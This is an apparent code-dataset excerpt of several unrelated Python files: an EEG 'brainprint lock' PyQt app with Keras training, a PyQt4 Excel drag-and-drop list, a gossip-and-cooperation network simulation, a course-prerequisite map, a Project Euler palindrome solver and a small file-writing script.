np.vstack((y0,y1,y2)) \n\n ########################开始搭建神经网络#############################\n model=Sequential()\n model.add(Dense(240, input_shape=(24,)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(240,kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(240,kernel_regularizer=regularizers.l2(0.01),bias_regularizer=regularizers.l2(0.01)))\n model.add(Activation('relu'))\n model.add(Dropout(0.2))\n\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.compile(loss='binary_crossentropy',optimizer='rmsprop',metrics=['accuracy'])\n ########################神经网络搭建完毕#############################\n \n\n ################这个tb,是为了使用TensorBoard########################\n tb = TensorBoard(log_dir='./logs', # log 目录\n histogram_freq=0, # 按照何等频率(epoch)来计算直方图,0为不计算\n batch_size=32, # 用多大量的数据计算直方图\n write_graph=True, # 是否存储网络结构图\n write_grads=False, # 是否可视化梯度直方图\n write_images=False,# 是否可视化参数\n embeddings_freq=0, \n embeddings_layer_names=None, \n embeddings_metadata=None) \n\n # 在命令行,先conda activate envs,然后进入本代码所在的目录,然后用 tensorboard --logdir=logs/ 来看log\n # 然后打开chrome浏览器,输入http://localhost:6006/ 来查看\n # 如果出现tensorboard错误,那么需要修改 ...\\lib\\site-packages\\tensorboard\\manager.py,其中keras环境下的这个文件,我已经修改好了。\n ########################开始训练#############################\n for i in range(int(100/100)): #这个for,是1次性训练,是为了在TensorBoard中查看训练情况。\n #for i in range(100): #这个for,只是为了进度条的显示,所以分成 100次来训练。\n model.fit(x, y, epochs=int(training_times/100*100), batch_size=training_batch_size,verbose = 1,shuffle=True,callbacks=[tb]) #这一行带callbacks,是为了使用TensorBoard\n #model.fit(x, y, epochs=int(training_times/100), batch_size=training_batch_size,verbose = 1,shuffle=True) #这一行带callbacks,所以无法使用TensorBoard\n ui.progressBar.setProperty(\"value\", i+1)\n QApplication.processEvents() #用于PyQt界面的刷新,保证流畅程度。\n\n model.save(filename+'_key.h5')\n ########################训练完毕,并保存训练好的神经网络#############################\n\n ui.label.setText(\"你的脑纹锁设置成功!\")\n ui.label.repaint()\n ui.pushButton.setText(\"开始匹配测试\") \n ui.pushButton.repaint()\n ui.progressBar.setProperty(\"value\",0)\n step=3\n ui.label_2.setText(\"目前载入的是\"+filename+\"的已经训练好的脑纹\")\n ui.label_2.repaint()\n enable_Gui()\n\n if step==1: #### 录制脑电波\n disable_Gui()\n ui.label.setText(\"开始录制你的脑纹信息,请保持不动。\")\n ui.label.update()\n ui.pushButton.setText(\"1-录制脑纹中...\") \n ui.pushButton.repaint()\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect((server_address,5204))\n f = open(filename+'EEG.txt', 'w')\n for k in range(total_EEG_data_number):\n EEG_data=(s.recv(1024).decode('utf-8'))\n EEG_data_to_write=EEG_data+'\\r\\n'\n f.write(EEG_data_to_write)\n ui.progressBar.setProperty(\"value\", k/total_EEG_data_number*100+2)\n QApplication.processEvents() #用于PyQt界面的刷新,保证流畅程度。\n f.close()\n step=2\n ui.label_2.update()\n ui.label.setText(\"接下来神经网络开始学习并设置你的脑纹。\")\n ui.label.update()\n ui.pushButton.setText(\"2-开始机器学习\") \n ui.pushButton.repaint()\n enable_Gui()\n if step==0:\n ui.label.setText(\"返回第一步,请输入你的名字。\")\n ui.label.update()\n ui.pushButton.setText(\"1-重新开始录制脑纹\") \n ui.pushButton.repaint()\n ui.label_2.setText(\"目前没有载入任何已经训练好的脑纹。\")\n ui.label_2.repaint()\n step=1\n\ndef reset():\n global step,directly_load_model_flag\n step=0\n directly_load_model_flag=False\n ui.label_2.setText(\"目前没有载入任何已经训练好的脑纹。\")\n ui.label_2.repaint()\n ui.lineEdit.setText(\"请输入你的名字\")\n action() \n\ndef update_labels():\n 
ui.label_4.setText(\"EEG总采样帧数:\"+str(total_EEG_data_number))\n ui.label_5.setText(\"每次训练的帧数:\"+str(training_batch_size))\n ui.label_6.setText(\"训练的总次数:\"+str(training_times))\n ui.label_7.setText(\"用于识别的帧数:\"+str(total_EEG_data_number_for_test))\n\ndef apply_parameters():\n global server_address,total_EEG_data_number,training_times,training_batch_size,total_EEG_data_number_for_test\n server_address=ui.lineEdit_2.text()\n total_EEG_data_number=int(ui.horizontalSlider.value()*total_EEG_data_number_times) #读取n条EEG数据\n total_EEG_Features=24 #这是固定的。每一条EEG数据都有24个参数值。\n training_batch_size=int(ui.horizontalSlider_2.value()*4) #每次训练输入的EEG帧数\n training_times=int(ui.horizontalSlider_3.value()*4) #训练的次数\n total_EEG_data_number_for_test=int(ui.horizontalSlider_4.value())\n update_labels()\n\n\n\n\ndef reset_parameters():\n global server_address,total_EEG_data_number,training_times,training_batch_size,total_EEG_data_number_for_test\n ui.horizontalSlider.setValue(50)\n ui.horizontalSlider_2.setValue(50)\n ui.horizontalSlider_3.setValue(50)\n ui.horizontalSlider_4.setValue(50)\n ui.lineEdit_2.setText(\"127.0.0.1\")\n server_address=ui.lineEdit_2.text()\n total_EEG_data_number=int(ui.horizontalSlider.value()*total_EEG_data_number_times) #读取n条EEG数据\n total_EEG_Features=24 #这是固定的。每一条EEG数据都有24个参数值。\n training_batch_size=int(ui.horizontalSlider_2.value()*4) #每次训练输入的EEG帧数\n training_times=int(ui.horizontalSlider_3.value()*4) #训练的次数\n total_EEG_data_number_for_test=int(ui.horizontalSlider_4.value())\n \n #print(\"reset\",server_address,total_EEG_data_number,training_times,training_batch_size,total_EEG_data_number_for_test)\n update_labels()\n\n\ndef load_saved_model():\n global step,directly_load_model_flag,openfile_name,directly_load_filename\n openfile_name = QFileDialog.getOpenFileName(ui,'选择文件','','h5 files(*.h5)')\n print(openfile_name[0])\n directly_load_filename=openfile_name[0]\n directly_load_model_flag=True\n if directly_load_filename!='':\n ui.label.setText(\"你的脑纹锁设置成功!\")\n ui.label.repaint()\n ui.pushButton.setText(\"开始匹配测试\") \n ui.pushButton.repaint()\n ui.progressBar.setProperty(\"value\",0)\n step=3\n fileinfo = QFileInfo(directly_load_filename);\n fileName = fileinfo.fileName();\n ui.label_2.setText(\"目前载入的已经训练好的脑纹是: \"+fileName[:-7])\n ui.label_2.repaint()\n ui.lineEdit.setText(fileName[:-7])\n ui.lineEdit.repaint()\n\ndef disable_Gui():\n ui.pushButton.setEnabled(False)\n ui.pushButton_2.setEnabled(False)\n ui.pushButton_3.setEnabled(False)\n ui.pushButton_4.setEnabled(False)\n ui.horizontalSlider.setEnabled(False)\n ui.horizontalSlider_2.setEnabled(False)\n ui.horizontalSlider_3.setEnabled(False)\n ui.horizontalSlider_4.setEnabled(False)\n\ndef enable_Gui():\n ui.pushButton.setEnabled(True)\n ui.pushButton_2.setEnabled(True)\n ui.pushButton_3.setEnabled(True)\n ui.pushButton_4.setEnabled(True)\n ui.horizontalSlider.setEnabled(True)\n ui.horizontalSlider_2.setEnabled(True)\n ui.horizontalSlider_3.setEnabled(True)\n ui.horizontalSlider_4.setEnabled(True)\n\n\n\napp = QApplication(sys.argv)\nmainWindow = QMainWindow()\nui =Ui_MainWindow()\nui.setupUi(mainWindow)\n# setup stylesheet\n#app.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n\n\nui.progressBar.setProperty(\"value\", 0)\nui.pushButton.setText(\"1-开始录制脑纹\")\nui.label_2.setText(\"目前没有载入任何已经训练好的脑纹。\")\nui.label_2.repaint() 
\nui.pushButton.clicked.connect(action)\nui.pushButton_2.clicked.connect(reset)\nui.pushButton_3.clicked.connect(load_saved_model)\nui.pushButton_4.clicked.connect(reset_parameters)\n\nui.horizontalSlider.sliderMoved.connect(apply_parameters)\nui.horizontalSlider_2.sliderMoved.connect(apply_parameters)\nui.horizontalSlider_3.sliderMoved.connect(apply_parameters)\nui.horizontalSlider_4.sliderMoved.connect(apply_parameters)\n\nmainWindow.show()\nsys.exit(app.exec_())","sub_path":"MindLocker-backup.py","file_name":"MindLocker-backup.py","file_ext":"py","file_size_in_byte":19857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
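The verification pass in the MindLocker record above reduces to a frame vote: score each sampled EEG frame with the trained network and count how many clear match_triger. A minimal standalone sketch of that decision rule, assuming a trained Keras model and an (N, 24) float array of frames; the 50% accept cutoff is an illustrative assumption, not taken from the record:

```python
import numpy as np

def match_rate(model, frames, match_triger=0.99):
    """Fraction of EEG frames whose sigmoid score clears the threshold."""
    scores = model.predict(frames, verbose=0)      # shape (N, 1), sigmoid outputs
    return float(np.mean(scores >= match_triger))

# unlocked = match_rate(model, frames) >= 0.5     # hypothetical accept rule
```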
+{"seq_id":"131109795","text":"import os\nimport sys\n\nfrom PyQt4.QtGui import QApplication\nfrom PyQt4 import QtCore, QtGui\nfrom PyQt4.QtGui import (QGridLayout, QHBoxLayout, QLabel, QWidget,\n QMessageBox, QPushButton, QVBoxLayout, QListWidget)\n\n\nclass FileList(QListWidget):\n def __init__(self, parent=None):\n super(FileList, self).__init__(parent)\n self.setAcceptDrops(True)\n self.setIconSize(QtCore.QSize(25, 25))\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasUrls:\n event.accept()\n else:\n event.ignore()\n\n def dragMoveEvent(self, event):\n if event.mimeData().hasUrls:\n event.setDropAction(QtCore.Qt.CopyAction)\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n if event.mimeData().hasUrls:\n event.setDropAction(QtCore.Qt.CopyAction)\n event.accept()\n links = []\n for url in event.mimeData().urls():\n links.append(str(url.toLocalFile()))\n self.emit(QtCore.SIGNAL(\"dropped\"), links)\n else:\n event.ignore()\n\n\nclass CreditCard(QWidget):\n def __init__(self, parent=None):\n super(CreditCard, self).__init__(parent)\n\n fileLabel = QLabel(\"Excel files:\")\n self.fileList = FileList(self)\n self.connect(self.fileList, QtCore.SIGNAL(\"dropped\"), self.fileDrop)\n\n self.cashdepo = QPushButton(\"&Cash Depo\")\n self.cashdepo.show()\n self.crediCard = QPushButton(\"C&redit Card\")\n self.crediCard.show()\n\n self.cashdepo.clicked.connect(self.getCashDepo)\n self.crediCard.clicked.connect(self.getCreditCard)\n\n buttonLayout1 = QVBoxLayout()\n buttonLayout1.addWidget(self.cashdepo, QtCore.Qt.AlignTop)\n buttonLayout1.addWidget(self.crediCard)\n buttonLayout1.addStretch()\n\n mainLayout = QGridLayout()\n mainLayout.addWidget(fileLabel, 0, 0)\n mainLayout.addWidget(self.fileList, 1, 0)\n mainLayout.addLayout(buttonLayout1, 1, 1)\n\n self.setLayout(mainLayout)\n self.setWindowTitle(\"Credit Card & Cash Depo XL\")\n\n def fileDrop(self, l):\n for url in l:\n if os.path.exists(url):\n print(url)\n if url.endswith('.xls'):\n icon = QtGui.QIcon(url)\n pixmap = icon.pixmap(25, 25)\n item = QtGui.QListWidgetItem(url, self.fileList)\n item.setIcon(icon)\n item.setStatusTip(url)\n else:\n QtGui.QMessageBox.warning(self, \"Non-Excel File\", \"Cannot add non-excel file\")\n\n def getCashDepo(self):\n filename = self.getFileList()\n for f in filename:\n print\n print(f.text())\n\n def getCreditCard(self):\n pass\n\n def getFileList(self):\n items = []\n for i in range(self.fileList.count()):\n items.append(self.fileList.item(i))\n\n return items\n\n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n ccard = CreditCard()\n ccard.show()\n\n sys.exit(app.exec_())\n","sub_path":"creditCard-qt4.py","file_name":"creditCard-qt4.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"580503806","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 10 13:49:29 2018\r\n@author: Lucia Pie\r\n\"\"\"\r\nimport networkx as nx\r\nimport itertools as it\r\nimport random\r\nimport calculation as calc\r\nfrom math import exp\r\n\r\n\r\ndef creat_network(rows, cols, neigh_num):\r\n g = nx.grid_2d_graph(rows, cols, periodic = False) # periodic set to True creates a toroid\r\n \r\n if neigh_num == 8:\r\n # adding second order connections\r\n new_edges = []\r\n \r\n # saving new edges to create\r\n for node in g.nodes():\r\n neighbors = g.neighbors(node)\r\n neighbor_pairs = it.combinations(neighbors, 2)\r\n for pair in neighbor_pairs:\r\n common_node = list((set(g.neighbors(pair[0])) & set(g.neighbors(pair[1]))) - {node})\r\n if common_node:\r\n if (node, common_node[0]) not in new_edges and (common_node[0], node) not in new_edges:\r\n new_edges.append((node, common_node[0]))\r\n \r\n # creating new edges\r\n for node_pair in new_edges:\r\n g.add_edge(node_pair[0], node_pair[1])\r\n \r\n elif neigh_num == 12:\r\n # adding second order connections\r\n new_edges = []\r\n \r\n # saving new edges to create\r\n for node in g.nodes():\r\n neighbors = g.neighbors(node)\r\n neighbor_pairs = it.combinations(neighbors, 2)\r\n for pair in neighbor_pairs:\r\n if (pair[0], pair[1]) not in new_edges and (pair[1], pair[0]) not in new_edges:\r\n new_edges.append((pair[0], pair[1]))\r\n \r\n # creating new edges\r\n for node_pair in new_edges:\r\n g.add_edge(node_pair[0], node_pair[1])\r\n \r\n elif neigh_num != 4:\r\n print('Invalid option for neigh_num.')\r\n \r\n return g\r\n \r\ndef network_initialization(g, cols, c_strategy_init, g_strategy_init, randomseed):\r\n random.seed(randomseed)\r\n rows = int(g.number_of_nodes() / cols)\r\n for node in g.nodes():\r\n g.node[node]['cooperation'] = random.choice(c_strategy_init)\r\n g.node[node]['gossip'] = random.choice(g_strategy_init)\r\n g.node[node]['last_c_rep'] = [['NA'] * cols for i in range(rows)] # how people remember others' last behavior\r\n g.node[node]['c_str_rep'] = [['NA'] * cols for i in range(rows)] # whether people know others' actual strategy\r\n g.node[node]['g_str_rep'] = [['NA'] * cols for i in range(rows)]\r\n g.node[node]['rep_num'] = [[0] * cols for i in range(rows)] # how many times the agent has received gossip about another agent\r\n \"\"\"\r\n Now I suppose that the more gossip one has received, the more likely he would know one's true strategy.\r\n In reality, the information can be inaccurate. In the future, I'll change it to a real model-based strategy.\r\n \"\"\"\r\n g.node[node]['inter_with_agent'] = [[0] * cols for i in range(rows)] # how many times have the agent interacted with the current agent\r\n \"\"\"\r\n It is designed especially for the new O2 who would act nicely twice at the beginning.\r\n \"\"\"\r\n g.node[node]['last_g_rep'] = [['NA'] * cols for i in range(rows)]\r\n g.node[node]['accum_payoff'] = 0.\r\n g.node[node]['inter_time'] = 0 # how many times an agent has interacted in the whole process\r\n g.node[node]['aver_payoff'] = 0. 
# aver_payoff in the whole process\r\n g.node[node]['last_payoff'] = 0.\r\n g.node[node]['iter_payoff_all'] = 0.\r\n g.node[node]['iter_inter_time'] = 0\r\n g.node[node]['iter_inter_avg'] = 0.\r\n g.node[node]['last_action'] = 'NA'\r\n g.node[node]['last_gossip'] = 'NA' # last time when this agent was chosen in a gossip phase, whether he gossiped or not\r\n g.node[node]['inf_accur'] = 0.\r\n return g\r\n\r\ndef cooperation(g, group_num, subset_size, c, r):\r\n # initialization for the current iteration\r\n for node in g:\r\n g.node[node]['iter_payoff_all'] = 0.\r\n g.node[node]['iter_inter_time'] = 0\r\n g.node[node]['iter_inter_avg'] = 0.\r\n \r\n # choose the pairs/groups to interact\r\n # only modify this part if switch to a PGG\r\n \"\"\"\r\n We may need to think about whether a full interaction will bring about a different result,\r\n especially when every one interact with all of his neighbors.\r\n \"\"\" \r\n group_list = calc.selectfromlist(list(g.edges()), min(group_num, len(list(g.edges()))))\r\n \r\n for group in group_list:\r\n # decide their action, action is saved in 'last_action'\r\n for node in group:\r\n if g.node[node]['cooperation'] == 'O1' or g.node[node]['cooperation'] == 'O3':\r\n # whether there is a gossiper neighbor in the PGG\r\n gossiper_in_neighbor = calc.count_in_list(g.node[node]['last_g_rep'], list(set(g.neighbors(node)) & set(group)), 'G')\r\n \r\n if gossiper_in_neighbor > 0:\r\n g.node[node]['last_action'] = 'C'\r\n elif g.node[node]['cooperation'] == 'O3':\r\n defector_num = calc.count_in_list(g.node[node]['last_c_rep'], group, 'D')\r\n if g.node[node]['last_c_rep'][node[0]][node[1]] == 'D': # don't count for their own reputation\r\n defector_num -= 1\r\n if defector_num >= subset_size / 2.:\r\n g.node[node]['last_action'] = 'D'\r\n else:\r\n g.node[node]['last_action'] = 'C'\r\n else:\r\n g.node[node]['last_action'] = 'D'\r\n \r\n elif g.node[node]['cooperation'] == 'O2':\r\n defector_num = calc.count_in_list(g.node[node]['last_c_rep'], group, 'D')\r\n if g.node[node]['last_c_rep'][node[0]][node[1]] == 'D': # don't count for their own reputation\r\n defector_num -= 1\r\n if defector_num >= subset_size / 2.:\r\n g.node[node]['last_action'] = 'D'\r\n else:\r\n g.node[node]['last_action'] = 'C'\r\n \r\n # would act nicely twice if any of the agents in the group is new\r\n for node2 in group:\r\n if node2 == node:\r\n continue\r\n elif g.node[node]['inter_with_agent'][node2[0]][node2[1]] < 2:\r\n g.node[node]['last_action'] = 'C'\r\n \r\n elif g.node[node]['cooperation'] == 'O4':\r\n# # assume that reputation is transparent\r\n defector_num = calc.count_in_nodes(g, group, 'cooperation', 'D')\r\n \r\n# # assume that people need to KNOW about other's strategies but it's possible for them to know the strategies\r\n# defector_num = calc.count_in_list(g.node[node]['c_str_rep'], group, 'D')\r\n# if g.node[node]['c_str_rep'][node[0]][node[1]] == 'D': # don't count for their own reputation\r\n# defector_num -= 1\r\n# \r\n# if defector_num >= subset_size / 2.:\r\n# g.node[node]['last_action'] = 'D'\r\n# else:\r\n# g.node[node]['last_action'] = 'C'\r\n# \r\n# # would act nicely twice if any of the agents in the group is new\r\n# for node2 in group:\r\n# if node2 == node:\r\n# continue\r\n# elif g.node[node]['inter_with_agent'][node2[0]][node2[1]] < 2:\r\n# g.node[node]['last_action'] = 'C'\r\n \r\n else:\r\n g.node[node]['last_action'] = g.node[node]['cooperation']\r\n \r\n # cooperation game\r\n count_C = calc.count_in_nodes(g, group, 'last_action', 'C')\r\n aver_pay 
= count_C * c * r / float(subset_size)\r\n\r\n for node in group: \r\n g.node[node]['inter_time'] += 1\r\n g.node[node]['iter_inter_time'] += 1\r\n if g.node[node]['last_action'] == 'C':\r\n g.node[node]['accum_payoff'] += aver_pay - c\r\n g.node[node]['iter_payoff_all'] += aver_pay - c\r\n g.node[node]['last_payoff'] = aver_pay - c\r\n else:\r\n g.node[node]['accum_payoff'] += aver_pay\r\n g.node[node]['iter_payoff_all'] += aver_pay\r\n g.node[node]['last_payoff'] = aver_pay\r\n g.node[node]['aver_payoff'] = g.node[node]['accum_payoff'] / g.node[node]['inter_time']\r\n g.node[node]['iter_inter_avg'] = g.node[node]['iter_payoff_all'] / g.node[node]['iter_inter_time']\r\n \r\n # agents in the cooperation game update their partner's reputation\r\n # know their neighbors' last behavior\r\n for node2 in group:\r\n if node2 == node:\r\n continue\r\n g.node[node]['inter_with_agent'][node2[0]][node2[1]] += 1\r\n if node2 not in list(g.neighbors(node)):\r\n continue\r\n g.node[node]['last_c_rep'][node2[0]][node2[1]] = g.node[node2]['last_action']\r\n# g.node[node]['rep_num'][node2[0]][node2[1]] += 1\r\n \"\"\"\r\n I commented it because I assume that people can't know the partner's true strategy through direct interaction.\r\n They can only get this infomration through gossip.\r\n \"\"\"\r\n\r\n return g\r\n\r\ndef gossip_talk(g, gossiper_node, target_node, receiver_node, gc):\r\n if target_node == receiver_node:\r\n return g\r\n else:\r\n g.node[receiver_node]['rep_num'][target_node[0]][target_node[1]] += 1\r\n g.node[gossiper_node]['last_gossip'] = 'G'\r\n g.node[receiver_node]['last_g_rep'][gossiper_node[0]][gossiper_node[1]] = 'G'\r\n g.node[gossiper_node]['accum_payoff'] -= gc\r\n g.node[gossiper_node]['iter_payoff_all'] -= gc \r\n g.node[gossiper_node]['last_payoff'] -= gc\r\n g.node[gossiper_node]['aver_payoff'] = g.node[gossiper_node]['accum_payoff'] / g.node[gossiper_node]['inter_time']\r\n g.node[gossiper_node]['iter_inter_avg'] = g.node[gossiper_node]['iter_payoff_all'] / g.node[gossiper_node]['iter_inter_time']\r\n return g\r\n\r\ndef non_gossip_talk(g, gossiper_node, receiver_node):\r\n g.node[receiver_node]['last_g_rep'][gossiper_node[0]][gossiper_node[1]] = 'N'\r\n g.node[gossiper_node]['last_gossip'] = 'N'\r\n return g\r\n \r\ndef gossiping(g, gossiper_num, target_num, receiver_num, gc):\r\n# a fixed amount of agents will be chosen, but the agents chosen are not necessarily gossipers\r\n# the chosen agent will talk to people, but he will gossip only when he is a gossiper and knows something\r\n # choose gossipers\r\n gossiper_size = min(gossiper_num, len(list(g.nodes())))\r\n gossiper_list = calc.selectfromlist(g.nodes(), gossiper_size)\r\n \r\n # talking\r\n for node in gossiper_list:\r\n g.node[node]['last_gossip'] = 'N'\r\n \r\n # choose some neighbors to talk\r\n # the receiver list can be someone else in future models\r\n receiver_list_all = []\r\n receiver_size = min(receiver_num, len(list(g.neighbors(node))))\r\n for neighbor in g.neighbors(node):\r\n receiver_list_all.append(neighbor)\r\n receiver_list = calc.selectfromlist(receiver_list_all, receiver_size)\r\n \r\n if g.node[node]['gossip'] == 'G':\r\n # choose some targets to gossip about\r\n target_list_all = []\r\n target_list = []\r\n for target in g.nodes():\r\n if g.node[node]['c_str_rep'][target[0]][target[1]] != 'NA' or g.node[node]['last_c_rep'][target[0]][target[1]] != 'NA':\r\n if target == node:\r\n continue\r\n target_list_all.append(target)\r\n target_size = min(target_num, len(target_list_all))\r\n 
target_list = calc.selectfromlist(target_list_all, target_size)\r\n \"\"\"\r\n Now people choose targets from the agents whose reputation/last_action has already be known.\r\n So as long as you're a gossiper, you can always find someone you know to gossip about.\r\n It's unlikely that a gossiper don't talk during a gossiping phase.\r\n So now gossip rate is approximately the same as proportion of gossipers.\r\n \"\"\"\r\n \r\n # gossip to each receiver about each target\r\n for target in target_list:\r\n for receiver in receiver_list:\r\n g = gossip_talk(g, node, target, receiver, gc)\r\n \r\n elif g.node[node]['gossip'] == 'N':\r\n for receiver in receiver_list:\r\n g = non_gossip_talk(g, node, receiver) # if someone is chosen but didn't gossip, people will think the agent is not a gossiper\r\n\r\n return g\r\n\r\ndef reproduction(g, cols, fermi_num, payoff_index, s, mu_rate, c_strategy, g_strategy):\r\n n = g.number_of_nodes()\r\n fermi_index_all = list(range(n))\r\n random.shuffle(fermi_index_all)\r\n # the indices of the students chosen in the current iteration\r\n fermi_index = [fermi_index_all[i] for i in range(min(fermi_num, n))]\r\n \r\n for student_index in fermi_index:\r\n student = calc.order2position(student_index, cols)\r\n \r\n # learn only from immediate neighbors\r\n teacher = random.choice(list(g.neighbors(student)))\r\n \r\n # can also try letting them learn from a random teacher\r\n # teacher = random.choice(list(g.nodes()))\r\n \r\n p = 1. / (1 + exp(0 - s * (g.node[teacher][payoff_index] - g.node[student][payoff_index])))\r\n \r\n if random.random() < p:\r\n g.node[student]['cooperation'] = g.node[teacher]['cooperation']\r\n g.node[student]['gossip'] = g.node[teacher]['gossip']\r\n \r\n # born as a completely new agent\r\n g.node[student]['accum_payoff'] = 0\r\n g.node[student]['inter_time'] = 0\r\n g.node[student]['inter_with_agent'] = [[0] * cols for i in range(int(n / cols))]\r\n\r\n if random.random() < mu_rate:\r\n g.node[student]['cooperation'] = random.choice(c_strategy)\r\n g.node[student]['gossip'] = random.choice(g_strategy)\r\n\r\n return g\r\n\r\ndef modelupdate(g, victim_num, target_num, f_rate, rs, rep_diff):\r\n victim_list = calc.selectfromlist(g.nodes(), victim_num)\r\n \r\n for victim in victim_list:\r\n target_list = calc.selectfromlist(list(g.nodes()), target_num)\r\n \r\n for target in target_list:\r\n if target == victim:\r\n continue\r\n if random.random() < f_rate: \r\n if g.node[victim]['rep_num'][target[0]][target[1]] > 0:\r\n g.node[victim]['rep_num'][target[0]][target[1]] -= 1\r\n p = 1 / (1 + exp(- rs * (g.node[victim]['rep_num'][target[0]][target[1]] - rep_diff)))\r\n if random.random() < p:\r\n g.node[victim]['c_str_rep'][target[0]][target[1]] = g.node[target]['cooperation']\r\n else:\r\n g.node[victim]['c_str_rep'][target[0]][target[1]] = g.node[victim]['last_c_rep'][target[0]][target[1]]\r\n \r\n for node in g.nodes():\r\n rep_num = 0.\r\n sum_num = 0.\r\n for node2 in g.nodes():\r\n sum_num += 1\r\n if g.node[node2]['cooperation'] == g.node[node]['c_str_rep'][node2[0]][node2[1]]:\r\n rep_num += 1\r\n g.node[node]['inf_accur'] = rep_num / sum_num\r\n \r\n return g\r\n\r\n\r\n\"\"\"\r\n############\r\n# Note:\r\n############\r\nNow the setting is that when people interact directly, they'll only remember their partner's behavior in their 'last_c_rep,'\r\nbut they won't update their 'c_str_rep' until the modelupdate phase.\r\n\r\n\r\n############\r\n# To do list:\r\n############\r\nadding trust 
rate\r\n\"\"\"","sub_path":"phases.py","file_name":"phases.py","file_ext":"py","file_size_in_byte":16027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
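The imitation step in reproduction() in the phases.py record above is a standard Fermi rule: the student copies the teacher with probability p = 1 / (1 + exp(-s * (payoff_teacher - payoff_student))), so the selection strength s sets how deterministic imitation is. A quick numeric check of that formula with illustrative payoffs:

```python
from math import exp

def fermi(payoff_teacher, payoff_student, s):
    """Probability that the student copies the teacher's strategies."""
    return 1.0 / (1.0 + exp(-s * (payoff_teacher - payoff_student)))

print(fermi(2.0, 0.0, s=1.0))   # ~0.881: a better-paid teacher is usually copied
print(fermi(2.0, 0.0, s=0.1))   # ~0.550: weak selection is close to a coin flip
print(fermi(0.0, 2.0, s=1.0))   # ~0.119: a worse-paid teacher is rarely copied
```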
+{"seq_id":"564232431","text":"'''\nStores all course objects based on current major in hashmap to easily assemble the tree.\n\ni.e.\n{\n BIO123 : corresponding base or nonbase course,\n ...,\n ...,\n MATH23 : base or nonbase course\n}\n'''\n\nimport courseInfoStorage as CIS\n\nclass courseConnections():\n '''\n Created 07/21/2021 by MFF\n '''\n\n def __init__(self, courses):\n self.courses = courses\n self.courseMap = {}\n\n def coursesToMap(self):\n #Take the list of courses and then using access paramters store in the hashmap\n\n for course in self.courses:\n courseKey = course.getKey()\n\n if courseKey not in self.courseMap:\n self.courseMap[courseKey] = course\n\n return\n\n # Return the prereq classes for a give course key\n def returnPrereqs(self, courseKey):\n if courseKey in self.courseMap:\n try:\n return self.courseMap[courseKey].getPrereqs()\n except TypeError as err:\n print(err)\n print(\"Requested course has no prereqs\")\n\n return\n\n def returnCourse(self, courseKey):\n if courseKey in self.courseMap:\n return self.courseMap[courseKey]\n\n return\n\n##END##\n","sub_path":"courseConnectionStorage.py","file_name":"courseConnectionStorage.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"42665928","text":"#Find the sum of all numbers, less than one million, which are palindromic in base 10 and base 2.\n\nmy_sum = 25\n\noddNumbers = []\n\nfor j in range (11, 1000000):\n if j%2 == 1:\n oddNumbers.append(j)\n \nfor i in oddNumbers:\n \n nts = str(i) #nts = num to string\n \n if len(nts) == 2 or len(nts) == 3: \n if nts[0] == nts[-1]: \n mb = bin(i)[2:] \n if len(mb) == 4 or len(mb) == 5: \n if mb[:2] == mb[:-3:-1]:\n my_sum += i\n if len(mb) == 6 or len(mb) == 7:\n if mb[:3] == mb[:-4:-1]:\n my_sum += i\n if len(mb) == 8 or len(mb) == 9:\n if mb[:4] == mb[:-5:-1]:\n my_sum += i\n if len(mb) == 10:\n if mb[:5] == mb[:-6:-1]:\n my_sum += i\n\n if len(nts) == 4 or len(nts) == 5:\n if nts[:2] == nts[:-3:-1]:\n mb = bin(i)[2:] #mb = my bin\n if len(mb) == 10 or len(mb) == 11: \n if mb[:5] == mb[:-6:-1]:\n my_sum += i\n if len(mb) == 12 or len(mb) == 13:\n if mb[:6] == mb[:-7:-1]:\n my_sum += i\n if len(mb) == 14 or len(mb) == 15:\n if mb[:7] == mb[:-8:-1]:\n my_sum += i\n if len(mb) == 16 or len(mb) == 17:\n if mb[:8] == mb[:-9:-1]:\n my_sum += i\n\n if len(nts) == 6:\n if nts[:3] == nts[:-4:-1]:\n mb = bin(i)[2:] #mb = my bin\n if len(mb) == 17: \n if mb[:8] == mb[:-9:-1]:\n my_sum += i\n if len(mb) == 18 or len(mb) == 19:\n if mb[:9] == mb[:-10:-1]:\n my_sum += i\n if len(mb) == 20 or len(mb) == 15:\n if mb[:10] == mb[:-11:-1]:\n my_sum += i\n\nprint(my_sum)\n","sub_path":"p36.py","file_name":"p36.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"444578982","text":"'''\n@Author : sean cheng\n@Email : aya234@163.com\n@Create_Time : 2018/9/5\n@Program : 从键盘输入一些字符,逐个把它们写到指定的文件,直到输入一个@为止。\n'''\nfilename = input(\"请输入文件名:\\n\")\nfp = open(filename+'.txt','w',encoding='utf-8')\nch = input(\"请输入字符串:\\n\")\nwhile True:\n if '@' in ch:\n fp.write(ch.split('@')[0])\n break\n else:\n fp.write(ch + \" \")\n ch = input(\"请输入字符串:\\n\")\nfp.close()\n","sub_path":"python/考试练习题/in_and_out.py","file_name":"in_and_out.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
